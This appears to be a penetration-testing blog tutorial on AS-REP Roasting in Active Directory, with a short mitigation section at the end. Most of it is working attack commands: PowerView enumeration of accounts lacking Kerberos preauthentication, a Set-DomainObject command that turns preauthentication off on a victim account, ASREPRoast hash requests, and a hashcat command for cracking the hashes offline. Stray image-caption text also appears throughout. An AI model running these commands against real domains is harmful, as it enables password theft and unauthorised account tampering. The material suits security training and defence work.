AS-REP Roasting is a technique that exploits a weakness in the Kerberos protocol during initial authentication with the key distribution centre(KDC)

During the authentication stage, a user requests a Ticket Granting Ticket (TGT) from the KDC in the form of an AS-REQ packet.If the account exists, the KDC will return a TGT encrypted with the account’s credentials, meaning that only a valid user or machine possessing the valid credentials is able to decrypt the ticket.

Any user who is able to make a request to the KDC can also request a TGT for any arbitrary user. That allows an attacker to receive an encrypted ticket which can then be brute forced offline to retrieve the password.

If a user’s UserAccountControl settings have “Do not require Kerberos pre authentication” enabled i.e. Kerberos preauth is disabled, it is possible to grab the user’s crackable AS-REP and brute-force it offline.

Enumerating accounts with Kerberos Preauth disabled using Powerview

Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
TextDescription automatically generated

if we want to check for a specific user we can do

Get-DomainUser username | ConvertFrom-UACValue

and check if it  has DONT_REQ_PREAUTH property

Graphical user interfaceDescription automatically generated with low confidence

In case we don’t have preauth disabled but we have  GenericWrite or GenericAll rights.We can force kerberos preauth disabled. To do so we need to add 4194304(dont_req_preauth) property flag on the user.

Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
TextDescription automatically generated

Request encrypted AS-REP for offline brute force.

We will use ASREPRoast but you can do it with Rubeus too.

Get-ASREPHash function, wraps New-ASReq to generate the appropriate AS-REQ for a given user/domain, enumerates the DC for the passed domain and sends the crafted AS-REQ and receives the response bytes

Get-ASREPHash -Domain domain -UserName username -Verbose

We can also use the Invoke-ASREQRoast function to find all the users that don’t require kerberos preauthentication:

Invoke-ASREQRoast -Verbose | fl
Graphical user interface, textDescription automatically generated

Cracking AS-REP Hashes with HashCat

we need to add 23 after the $krb5asrep like this:

$krb5asrep$23$admin@first.local:….

and crack it

! hashcat -m 18200 -a 3 -O '$krb5asrep$23$admin@first.local:...' /path/to/wordlist
TextDescription automatically generated

Mitigation

To defend against ASRepRoasting you need to search and identify for user accounts that are set to not require Kerberos pre-authentication and remove any instances of it. You can find these accounts by using a LDAP filter query

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Another countermeasure is the use of long, complex passwords that are not found in breached wordlists, to make it harder for the attacker to crack them.